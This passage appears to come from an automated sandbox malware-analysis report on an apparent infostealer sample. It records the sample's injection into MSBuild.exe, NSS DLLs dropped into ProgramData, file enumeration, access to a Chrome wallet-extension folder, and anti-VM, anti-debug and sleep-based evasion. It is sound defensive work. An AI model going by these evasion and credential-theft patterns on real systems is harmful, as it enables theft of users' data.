                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00417A40
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A409D push ds; retf 0002h0_2_054A409E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CDD5 push ecx; ret 4_2_0041CDE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B536 push ecx; ret 4_2_6C59B549
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.csHigh entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
                        Source: 0.2.file.exe.5400000.14.raw.unpack, zcrmeG4DKc05Qj8A7l.csHigh entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00417A40
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.8 %
                        Source: C:\Users\user\Desktop\file.exe TID: 6200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_004099F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040A2C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004156C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040C2E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_00414F80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415A70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040AAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_004153C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040FDA0 GetSystemInfo,wsprintfA,4_2_0040FDA0
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareD
                        Source: Amcache.hve.10.drBinary or memory string: VMware
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                        Source: file.exeBinary or memory string: T7KKDqemuqJg3uTqm2mj
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-93538
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D12F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402000 VirtualProtect 00000000,00000004,00000100,?4_2_00402000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4